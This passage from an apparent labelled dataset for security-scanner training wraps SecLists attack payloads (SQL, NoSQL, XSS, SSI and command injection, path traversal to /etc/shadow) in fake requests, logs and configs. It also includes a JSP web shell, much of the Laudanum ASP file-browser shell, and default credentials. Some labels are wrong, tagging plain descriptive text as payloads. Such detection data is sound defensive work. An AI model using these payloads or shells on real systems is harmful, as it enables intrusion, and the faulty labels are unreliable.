%27%7C%20%5B%203%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%7C%20%5B%203%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_00326", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\"-\" HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"-\"", "injection_type": "SQL"}}]} {"id": "seclists_00327", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=dodger\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "dodger"}}]} {"id": "seclists_00328", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7Cecho%20LLYIHD$((46%2B68))$(echo%20LLYIHD)LLYIHD%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho%20LLYIHD$((46%2B68))$(echo%20LLYIHD)LLYIHD%26", "injection_type": "cmd"}}]} {"id": "seclists_00329", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n[$ne]=1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "[$ne]=1", "injection_type": "NoSQL"}}]} {"id": "seclists_00330", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ' or uname like '%", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or uname like '%", "injection_type": "cmd"}}]} {"id": "seclists_00331", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=kappa\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "kappa"}}]} {"id": "seclists_00332", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_00333", "source": "seclists", "source_license": "MIT", "text": "<% \nRuntime.getRuntime().exec(request.getParameter(\"cmd\"));\n%>\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "jsp", "filename": "simple-shell.jsp"}}]} {"id": "seclists_00334", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=comet\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "comet"}}]} {"id": "seclists_00335", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit String: navigatorurl:test\" -chrome \"javascript:C=Components.classes;I=Components.interfaces;file=C[\\'@mozilla.org/file/local;1\\'].createInstance(I.nsILocalFile);file.initWithPath(\\'C:\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'Windows\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'System32\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'cmd.exe\\');process=C[\\'@mozilla.org/process/util;1\\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: navigatorurl:test\" -chrome \"javascript:C=Components.classes;I=Components.interfaces;file=C[\\'@mozilla.org/file/local;1\\'].createInstance(I.nsILocalFile);file.initWithPath(\\'C:\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'Windows\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'System32\\'+String.fromCharCode(92)+String.fromCharCode(92)+\\'cmd.exe\\');process=C[\\'@mozilla.org/process/util;1\\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);al", "injection_type": "XSS"}}]} {"id": "seclists_00336", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Half-Open HTML/JavaScript</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Half-Open HTML/JavaScript", "injection_type": "XSS"}}]} {"id": "seclists_00337", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=x' AND userid IS NULL; -- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' AND userid IS NULL; --", "injection_type": "SQL"}}]} {"id": "seclists_00338", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Null Chars 1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Null Chars 1", "injection_type": "XSS"}}]} {"id": "seclists_00339", "source": "seclists", "source_license": "MIT", "text": "<%@Language=\"VBScript\"%>\n<%Option Explicit%>\n<%Response.Buffer = True%> \n<%\n' *******************************************************************************\n' ***\n' *** Laudanum Project\n' *** A Collection of Injectable Files used during a Penetration Test\n' ***\n' *** More information is available at:\n' *** http://laudanum.secureideas.net\n' *** laudanum@secureideas.net\n' ***\n' *** Project Leads:\n' *** Kevin Johnson <kjohnson@secureideas.net\n' *** Tim Medin <tim@counterhack.com>\n' ***\n' *** Copyright 2014 by Kevin Johnson and the Laudanum Team\n' ***\n' ********************************************************************************\n' ***\n' *** This file provides access to the file system.\n' *** Written by Tim Medin <tim@counterhack.com>\n' ***\n' ********************************************************************************\n' *** This program is free software; you can redistribute it and/or\n' *** modify it under the terms of the GNU General Public License\n' *** as published by the Free Software Foundation; either version 2\n' *** of the License, or (at your option) any later version.\n' ***\n' *** This program is distributed in the hope that it will be useful,\n' *** but WITHOUT ANY WARRANTY; without even the implied warranty of\n' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n' *** GNU General Public License for more details.\n' ***\n' *** You can get a copy of the GNU General Public License from this\n' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n' *** You can also write to the Free Software Foundation, Inc., Temple\n' *** Place - Suite Boston, MA USA.\n' ***\n' ***************************************************************************** */\n\n' ***************** Config entries below ***********************\n\n' Define variables\nDim allowedIPs \nDim allowed\nDim filepath\nDim file\nDim stream\nDim path\nDim i\nDim fso\nDim folder \nDim list\nDim temppath\n\n' IPs are enterable as individual addresses TODO: add CIDR support\nallowedIPs = \"192.168.0.1,127.0.0.1,::1\"\n' Just in cace you added a space in the line above\nallowedIPs = replace(allowedIPS,\" \",\"\")\n'turn it into an array\nallowedIPs = split(allowedIPS,\",\") '\n' make sure the ip is allowed\nallowed = 0\nfor i = lbound(allowedIPs) to ubound(allowedIPs)\n\tif allowedIPS(i) = Request.ServerVariables(\"REMOTE_ADDR\") then\n\t\tallowed = 1\n\t\texit for\n\tend if\nnext\n' send a 404 if the IP Address is not allowed\nif allowed = 0 then\n\tResponse.Status = \"404 File Not Found\"\n\tResponse.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))\n\tResponse.End\nend if\n\n' create file object for use everywhere\nset fso = CreateObject(\"Scripting.FileSystemObject\")\n\n' download a file if selected\nfilepath = trim(Request.QueryString(\"file\"))\n'validate file\nif len(filepath) > 0 then\n\tif fso.FileExists(filepath) then\n\t\t'valid file\n\n\t\tSet file = fso.GetFile(filepath)\n\t\tResponse.AddHeader \"Content-Disposition\", \"attachment; filename=\" & file.Name \n\t\t'Response.AddHeader \"Content-Length\", file.Size \n\t\tResponse.ContentType = \"application/octet-stream\"\n\t\tset stream = Server.CreateObject(\"ADODB.Stream\")\n\t\tstream.Open\n\t\tstream.Type = 1\n\t\tResponse.Charset = \"UTF-8\"\n\t\tstream.LoadFromFile(file.Path)\n\t\t' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.\n \t\tResponse.BinaryWrite(stream.Read)\n\t\tstream.Close\n\t\tset stream = Nothing\n\t\tset file = Nothing\n\t\tResponse.End\n\tend if\nend if\n\n' begin rendering the page\n%>\n<html>\n<head>\n <title>Laudanum ASP File Browser</title>\n</head>\n<body>\n\n<h1>Laudanum File Browser 0.1</h1>\n\n<%\n' get the path to work with, if it isn't set or valid then start with the web root\n' goofy if statement is used since vbscript doesn't use short-curcuit logic\npath = trim(Request.QueryString(\"path\"))\nif len(path) = 0 then\n\tpath = fso.GetFolder(Server.MapPath(\"\\\"))\nelseif not fso.FolderExists(path) then\n\tpath = fso.GetFolder(Server.MapPath(\"\\\"))\nend if\n\nset folder = fso.GetFolder(path)\n\n' Special locations, webroot and drives", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "asp", "filename": "file.asp"}}]} {"id": "seclists_00340", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = or a=a--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or a=a--", "injection_type": "SQL"}}]} {"id": "seclists_00341", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<var onpaste=\"alert(1)\" contenteditable>test</var>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<var onpaste=\"alert(1)\" contenteditable>test</var>", "injection_type": "XSS"}}]} {"id": "seclists_00342", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3Becho%20QPNMNQ$((33%2B62))$(echo%20QPNMNQ)QPNMNQ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho%20QPNMNQ$((33%2B62))$(echo%20QPNMNQ)QPNMNQ", "injection_type": "cmd"}}]} {"id": "seclists_00343", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: SCRIPT w/Alert()</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: SCRIPT w/Alert()", "injection_type": "XSS"}}]} {"id": "seclists_00344", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %00../../../../../../etc/shadow", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%00../../../../../../etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_00345", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Xerox,<BLANK>,11111,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Xerox,<BLANK>,11111,"}}]} {"id": "seclists_00346", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_00347", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: ha.ckers.org</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00348", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<strong onpaste=\"alert(1)\" contenteditable>test</strong>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<strong onpaste=\"alert(1)\" contenteditable>test</strong>", "injection_type": "XSS"}}]} {"id": "seclists_00349", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=kendall\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "kendall"}}]} {"id": "seclists_00350", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n{$gt: ''}", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "{$gt: ''}", "injection_type": "NoSQL"}}]} {"id": "seclists_00351", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=fleming\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "fleming"}}]} {"id": "seclists_00352", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_accept_charset\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_accept_charset\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00353", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, evil tags, obfuscated, internet explorer HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_00354", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '1 or pg_sleep(__TIME__)--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1 or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_00355", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=declare @s varchar(22) select @s = HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @s varchar(22) select @s =", "injection_type": "SQL"}}]} {"id": "seclists_00356", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:class", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "class"}}]} {"id": "seclists_00357", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><section draggable=\"true\" ondragstart=\"alert(1)\">test</section></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<section draggable=\"true\" ondragstart=\"alert(1)\">test</section>", "injection_type": "XSS"}}]} {"id": "seclists_00358", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=goochi\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "goochi"}}]} {"id": "seclists_00359", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Lucent,admin,Ascend,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lucent,admin,Ascend,"}}]} {"id": "seclists_00360", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id='%20or%20'x'='x HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20or%20'x'='x", "injection_type": "SQL"}}]} {"id": "seclists_00361", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=pimpdadd\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pimpdadd"}}]} {"id": "seclists_00362", "source": "seclists", "source_license": "MIT", "text": "username='hi' or 'x'='x';&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'hi' or 'x'='x';", "injection_type": "SQL"}}]} {"id": "seclists_00363", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: xsstest%00\"<>'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "xsstest%00\"<>'", "injection_type": "cmd"}}]} {"id": "seclists_00364", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:napster@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "napster"}}]} {"id": "seclists_00365", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: FRAME\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: FRAME", "injection_type": "XSS"}}]} {"id": "seclists_00366", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: -1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "-1", "injection_type": "cmd"}}]} {"id": "seclists_00367", "source": "seclists", "source_license": "MIT", "text": "password: Parrot,<BLANK>,0000,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Parrot,<BLANK>,0000,"}}]} {"id": "seclists_00368", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_00369", "source": "seclists", "source_license": "MIT", "text": "filename=/../../../../../../../../bin/id|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../bin/id|", "injection_type": "cmd"}}]} {"id": "seclists_00370", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'sqlvuln;';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "sqlvuln;", "injection_type": "SQL"}}]} {"id": "seclists_00371", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><small onblur=alert(1) tabindex=1 id=x></small><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<small onblur=alert(1) tabindex=1 id=x></small><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00372", "source": "seclists", "source_license": "MIT", "text": "password: Sagem,admin,admin,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sagem,admin,admin,"}}]} {"id": "seclists_00373", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{}</style><tfoot style=\"animation-name:x\" onanimationend=\"alert(1)\"></tfoot> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><tfoot style=\"animation-name:x\" onanimationend=\"alert(1)\"></tfoot>", "injection_type": "XSS"}}]} {"id": "seclists_00374", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%20echo%20JADUEG$((82%2B93))$(echo%20JADUEG)JADUEG\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20echo%20JADUEG$((82%2B93))$(echo%20JADUEG)JADUEG\"", "injection_type": "cmd"}}]} {"id": "seclists_00375", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Apache,role1,tomcat,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Apache,role1,tomcat,"}}]} {"id": "seclists_00376", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.", "injection_type": "XSS"}}]} {"id": "seclists_00377", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Null Chars 1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Null Chars 1", "injection_type": "XSS"}}]} {"id": "seclists_00378", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, basic, obfuscated, evil tags, internet explorer</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, basic, obfuscated, evil tags, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_00379", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Oracle,VIF_DEVELOPER,VIF_DEV_PWD,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,VIF_DEVELOPER,VIF_DEV_PWD,"}}]} {"id": "seclists_00380", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u", "injection_type": "cmd"}}]} {"id": "seclists_00381", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='; exec master..xp_cmdshell HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'; exec master..xp_cmdshell", "injection_type": "cmd"}}]} {"id": "seclists_00382", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><wbr draggable=\"true\" ondragleave=\"alert(1)\">test</wbr></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<wbr draggable=\"true\" ondragleave=\"alert(1)\">test</wbr>", "injection_type": "XSS"}}]} {"id": "seclists_00383", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LOGUJR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_00384", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><section onpaste=\"alert(1)\" contenteditable>test</section></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<section onpaste=\"alert(1)\" contenteditable>test</section>", "injection_type": "XSS"}}]} {"id": "seclists_00385", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags)", "injection_type": "XSS"}}]} {"id": "seclists_00386", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><select onbeforecut=\"alert(1)\" contenteditable>test</select></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<select onbeforecut=\"alert(1)\" contenteditable>test</select>", "injection_type": "XSS"}}]} {"id": "seclists_00387", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"remote_ident\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"remote_ident\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00388", "source": "seclists", "source_license": "MIT", "text": "password: Lucent,pw,pwpw,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lucent,pw,pwpw,"}}]} {"id": "seclists_00389", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Digital Equipment,NETPRIV,NETPRIV,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,NETPRIV,NETPRIV,"}}]} {"id": "seclists_00390", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: HTML entities (the semicolons are required for this to work).\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: HTML entities (the semicolons are required for this to work).", "injection_type": "XSS"}}]} {"id": "seclists_00391", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><iframe src=javascript:alert(1)></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<iframe src=javascript:alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00392", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<object data=javascript:alert(1)> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<object data=javascript:alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00393", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=< HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<", "injection_type": "cmd"}}]} {"id": "seclists_00394", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: SIrDarckCat</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: SIrDarckCat", "injection_type": "XSS"}}]} {"id": "seclists_00395", "source": "seclists", "source_license": "MIT", "text": "GET 